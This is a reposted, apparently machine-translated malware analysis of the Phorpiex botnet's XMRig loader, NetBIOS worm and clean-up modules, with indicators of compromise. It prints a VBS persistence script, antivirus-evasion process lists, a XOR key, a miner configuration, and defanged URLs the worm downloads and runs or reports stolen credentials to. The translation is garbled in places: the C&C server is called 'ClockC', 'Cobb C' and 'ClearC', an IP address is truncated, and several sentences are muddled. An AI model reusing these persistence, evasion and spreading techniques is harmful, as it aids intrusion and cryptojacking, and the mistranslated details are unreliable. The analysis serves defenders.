Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to achieve Phorpiex botnet technical analysis, the content of the article is of high quality, so the editor will share it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

XMRig

The main purpose of this module is to start the XMRig monero mining machine. The Monroe currency (or XMR) is a decentralized cryptocurrency identified by distributed consensus and then recorded on the blockchain. The cryptocurrency is so attractive to attackers that Monero cannot track it, confusing send and receive addresses and transaction volumes by default. Transactions on the Monero blockchain cannot be linked to specific users or real-world identities.

The Monero miner, which is made up of XMRig's open source code, is one of the payloads for Phorpiex botnets to make money, and infected computers generate about $15000 in revenue a month. The attacker implanted the miner into the infected computer and ran it, and the miner itself and its parameters were confused with a simple password and embedded in the module. Before execution, the malware decrypts the parameters and passes them to the miners.

Phorpiex uses the same XMRig as the one sold online, and the attacker probably bought it online.

Load process initialization

To prevent multiple XMRig from running, the loader creates a mutex with a hard-coded name. The name in the sample is different. The following hard-coded variants were found:

4b293105d7b102179b20

Bf73f1604fc0b6b3d70d

Persistence

The loader copies itself to "C:\ ProgramData\ {HardcodedFolder}\ {HardcodedExecutable}". Parameter values of "{HardcodedExecutable}" in different samples:

Cfgmgr.exe

Windrv32.exe

Sysdrv32.exe

The path "C:\ ProgramData\ {HardcodedFolder}" is also used to store temporary files, such as VB scripts and configurations passed to miners. Parameter values of "{HardcodedFolder}" in different samples:

FeSdavbMaL

ADwXcSSGvY

The malware creates a link to self-replication in the startup folder:

% APPDATA%\ Microsoft\ Windows\ Start Menu\ Programs\ Startup\ {HardcodedFilename} .url

Parameter values of "{HardcodedFilename}" in different samples:

KBBcUBIbha

LtHgNeMqRB

The following figure shows the links in the startup folder and the path to the executable file:

The loader chooses how to start URL based on whether the following anti-malware processes exist on the system:

A2guard.exe

A2service.exe

A2start.exe

If these integrations are not detected, create a startup link by executing the following script:

Set objFSO=CreateObject ("Scripting.FileSystemObject")

OutFile= "C:\ Users\ Lab\ AppData\ Roaming\ Microsoft\ Windows\ Start Menu\ Programs\ Startup\ kBBcUBIbha.url"

Set objFile = objFSO.CreateTextFile (outFile,True)

ObjFile.Write "[InternetShortcut]" & vbCrLf & "URL="file:///C:\ProgramData\FeSdavbMaL\cfgmgr.exe""""

ObjFile.Close

If the VB script fails to create this startup configuration or detects any of the processes listed above, it will be called directly from the loader using the WinAPI function. There is an additional check inside the function: whether any anti-malware processes are running. It is typically executed using the following command:

Cmd.exe / C WScript "C:\ ProgramData\ FeSdavbMaL\ r.vbs"

If you encounter any of the following procedures, use thread injection (see the thread injection section) instead of a direct "cmd" call:

Bdagent.exe

Vsserv.exe

Cfp.exe

Ccavsrv.exe

Cmdagent.exe

Avp.exe

Avpui.exe

Ksde.exe

For x86, the loader searches for explorer.exe. For x64, all processes are enumerated, but both are ignored:

Csrss.exe

Winlogon.exe

The following figure summarizes all of the above:

Encrypt

Loader configuration values and XMRig Miner payload use XOR encryption. The decryption key "0125789244697858" is hard-coded into the binary file. After decryption:

ClockC server URL to contact: http://185.176.27[.]132/update.txt

XMR crypto-wallet (re-written by the user ID but used directly in other Phorpiex modules):

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

Mining pool: 176.27.132:4545

Loader

The miner executable file is decrypted using a hard-coded XOR key:

The miner injects it into the address space of the newly created process from the "C:\ Windows\ System32" directory (that is, wuapp.exe). During execution, the loader checks the status of the taskmgr.exe. If the task manager is detected to be running, the loader terminates the miner and suspends the cycle until the task manager is no longer running. When no taskmgr.exe is detected, the miner will start again.

The following figure shows what it looks like:

Inject details

The most special thing about the injection process is the way the function is called. The loader maps its own copy of ntdll.dll, searches for the necessary functions, processes these functions with internal array pointers, and then calls them. The address of ntdll.dll is obtained through PEB:

There is an ntdll.dll address in ESI:

ESI 777A000 ntdll.777A000 miner configuration

The loader saves the configuration to "C:\ ProgramData\ {HardcodedFolder}\ cfg" and passes it to Miner as a command line argument. The configuration has the following structure:

{"algo": "cryptonight", "autosave": false, "background": false, "colors": true, "retries": 5, "retry-pause": 5, "syslog": false, "print-time": 60, "av": 0, "safe": false, "cpu-priority": null, "cpu-affinity": null "donate-level": 0, "threads": 1, "pools": [{"url": "185.176.27.132 url", "user": "ea7c252d-5590-4983-995d-02a1a35bb966", "pass": "x" "keepalive": false, "nicehash": false, "variant": "r", "tls": false, "tls-fingerprint": null}] "api": {"port": 0, "access-token": null, "worker-id": null}}

In the sample studied, all configuration values are hard-coded, and the "thread" value is equal to the number of processors in the system.

Unused information

A XMR wallet in memory was found during the execution of the loader. Different samples may contain different wallets.

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQujt72bSgzs7j6uNDV

4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoMMyaX2Eun2XCgFYq

Analyze the use of the XMR wallet in this module, check where the wallet address should be used, and find that it has been rewritten with the user ID, and then configured:

Network Communications

XMRig Loader checks the Cobb C server for new instructions and executes the found instructions. This communication is performed twice: using the unencrypted HTTP protocol before and after the miner injection. The value in the corresponding field:

Support command

The following is the format used when sending commands from the ClearC server (with the original comments retained):

[Miner] address=YOUR_XMR_ADDRES; XMR address, email (minergate), btc address (nicehash), etc.poolport=pool.minexmr.com:4444; Do not include 'stratum+tcp://' e.g monerohash.com:3333password=x; Pool passwordstop=0; Change this value to "1" to stop miner. If not specified or equal to "0" miner will work.proxy=0; Change this value to "1" if you are mining to xmrig-proxy instead of pool. This enables using a unqiue address per worker for better miner monitoring.keepalive=0; 0 to disable keepalive, 1 to enable keepalive [Update]; config_url= http://xmrminer.net/config.txt; You can update the url that points to the configuration file. Must begin with "http://" or" https://"knock_time=30; Number of minutes the miner waits between visits to config file. If never specified, default is 30 minutes.;update_url= http://mysite.com/new_miner; url of new miner. Miner will get updated with this file.;update_hash=xxxxxxxxxx; md5 hash of new miner file. 32 characters long (16 byte hexadecimal format for hash). You need to specify this value, othewise miner will not get updated of configuration. Do not remove this line, "; End" string specifies end of configuration file.;Everything after a ";" character is a comment, so it is ignored by the miner when parsing the configuration. Only the ";" character is used for this purpose.;Always include the appropriate options below the defined "[Miner]" and "[Update]" sections. If you do not include the section names it won't work.;Make sure everything is spelled correctly;If you specify "config_url" double check it is correctly spelled, otherwise the miner that reads an incorrect url will never go back to a correct url (i.e. Last configuration will be locked).

Miner update

Miner stop

The server may request a different file name:

C.txt

Upd.txt

Newup.txt

Update.txt

Xmrupdate.txt

Phorpiex NetBIOS Worm module

This module is a self-propagating worm with the ability to download other payloads. The NetBIOS worm scans random IP addresses for open 139TCP ports (NetBIOS) and uses a hard-coded list of usernames and passwords for brute force attacks. The attack uses the rand function to randomly generate the IP address for scanning, using the GetTickCount result as a random seed. IP address filtering rules cannot start with 127,172 or 192. The NetBIOS worm creates mutexes with hard-coded names to prevent multiple execution. Create a separate thread to communicate with each IP address, and the scanning function is very similar to the scanning function in the Phorpiex VNC worm module.

If it is loaded by Phorpiex Tldr, save the module with a pseudorandom name. During the self-propagation phase, malware uses "WindowsDefender.exe" to upload itself. In this case, the NetBIOS worm must download the Phorpiex main module or other payload. Malware gets its filename by calling GetModuleFilename. If the name is "WindowsDefender.exe", it attempts to download and execute the file from the hard-coded URL:

URL in different samples:

Hxxp://92.63.197.153/NB.exe

Hxxp://92.63.197.153/nb.exe

Hxxp://193.32.161.77/CRAZYBLAYNE.exe

Hxxp://92.63.197.153/enum.exe

Hxxp://193.32.161.77/enum.exe

Hxxp://193.32.161.77/aldenta.exe

Finally, infinite loop network scan. For each randomly generated IP address, the NetBIOS module starts a thread to check whether the port 139 TCP is listening. After a successful connection, the NetBIOS worm attempts to enumerate network shares by calling the NetShareEnum API function.

The Phorpiex NetBIOS worm attempts to connect to a network share using a hard-coded list of usernames and passwords:

After successfully connecting to a network resource, the malware attempts to copy itself to the following location:

WindowsDefender.exe

WINDOWS\ All Users\ StartMenu\ Programs\ Startup\ WindowsDefender.exe

WINDOWS\ StartMenu\ Programs\ Startup\ WindowsDefender.exe

WINNT\ Profiles\ All Users\ StartMenu\ Programs\ Startup\ WindowsDefender.exe

ProgramData\ Microsoft\ Windows\ Start Menu\ Programs\ StartUp\ WindowsDefender.exe

Users\ All Users\ Microsoft\ Windows\ Start Menu\ Programs\ WindowsDefender.exe

Documents and Settings\ All Users\ StartMenu\ Programs\ Startup\ WindowsDefender.exe

The target path points to the startup folder to ensure its persistence in the target system. The last step is to call the upload function on the target host, which can be performed in two ways:

Create a new service on the remote host. The malware uses "NetBIOS Windows Defender", sets the value SERVICE_WIN32_SHARE_PROCESS for the created service, and uses SERVICE_AUTO_START as the startup type.

Schedule tasks on the remote host. The scheduled time is 120 seconds at the current time. The malware obtains the time through the NetRemoteTOD API function and corrects it for a specific time zone.

After a successful operation, use a simple HTTP request to report to the ClearC server:

Snwprintf (url, L "hxxp://92.63.197.153/e.php?srv=%ls |% ls", NetLocation, UserName, Password, Message)

User agent for HTTP request:

Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko / 20100101 Firefox / 25.0

The malware can send the following message:

Information in other samples:

URL found in various samples:

Hxxp://193.32.161.77/nb.php?srv=

Hxxp://193.32.161.77/exec.php?srv=

Hxxp://193.32.161.77/nn.php?srv=

Hxxp://193.32.161.77/gud.php?srv=

Hxxp://193.32.161.77/go.php?srv=

Hxxp://193.32.161.77/netb.php?srv=

Hxxp://193.32.161.77/ok.php?srv=

Hxxp://92.63.197.153/e.php?srv=

Hxxp://92.63.197.153/huh.php?srv=

Hxxp://92.63.197.153/nb.php?srv=

Hxxp://92.63.197.153/tst.php?srv=

Hxxp://92.63.197.153/ya.php?nb=

Auxiliary module

Phorpiex is very generic. The main module receives a queue of commands, each of which is a separate executable module. Many different variants of micromodules with very limited functions have also been observed. Such small executables loaded by Phorpiex, such as Clean-Up modules. It contains two functions designed to terminate a process with a specified hard-coded name and delete multiple registry entries.

The list of processes terminated by the cleanup module includes:

Winsrvc32.exe

Winupsvcmgr.exe

Winsvcinstl.exe

Winupd32svc.exe

Wincfg32svc.exe

Windrv.exe

Wincfgrmg***.exe

Winmgr.exe

Wincfg.exe

Wincfg32.exe

Winupd.exe

Winupd32.exe

Winsvcin32.exe

Winupd32cfg.exe

Winmg***cfg.exe

Csrssc.exe

Csrsscxn.exe

Winsecmgr.exe

Winsecmgrv.exe

Windrvmg***.exe

The cleanup module also removes the following values from the registry key "HKLM\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run\":

WinCfgMgr

Windows Update Service Manager

Microsoft Windows Update Services

Microsoft Update 495036

Microsoft Windows Service Installer

Microsoft Windows Driver Configuration

Microsoft Windows Installer Svc

Windows Security Manager

This module disables obsolete Phorpiex modules, such as Phorpiex Trik:

Another small executable type is geolocation. It uses the service api.wipmania.com to determine the location of the infected computer. If you are in the whitelist, the malware downloads the payload from the hard-coded URL:

Loaders for China and Vietnam were discovered in early 2019 to load different variants of GandCrab blackmail software into infected computers based on location information.

Summary

Phorpiex is a very special family of malware, whose functions include a variety of different modules, each of which undertakes special tasks: sending spam, infecting worms, and so on. If new features are needed, new modules are introduced without the need to rebuild or reconfigure existing modules. This method is not easy to make mistakes, takes less time, and saves a lot of energy for malware developers.

To date, Phorpiex has infected more than 1 million computers and generated considerable profits. All we can see and estimate is the tip of the iceberg. Raccoon Stealer and Predator the Thief in the Phorpiex family also have their own unique ways to carry out malicious activities.

IOCXMRig Silent Loader

Mutex names

0fe420b0eb8396a48280

3f3ff4de39fc87f8152a

4b293105d7b102179b20

5d6eb4d965fd09330511

A6c92143cac02de51d4a

Bf73f1604fc0b6b3d70d

Ff9702c705fd434610c0

Strings

0125789244697858

F23e1993dfdXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

ObjFile.Write "[InternetShortcut]" & vbCrLf & "URL="file:///"

Phorpiex NetBIOS Worm Module

URLs

Hxxp://92.63.197.153/NB.exe

Hxxp://92.63.197.153/nb.exe

Hxxp://193.32.161.77/CRAZYBLAYNE.exe

Hxxp://92.63.197.153/enum.exe

Hxxp://193.32.161.77/enum.exe

Hxxp://193.32.161.77/aldenta.exe

Auxiliary modules

On how to achieve Phorpiex botnet technical analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.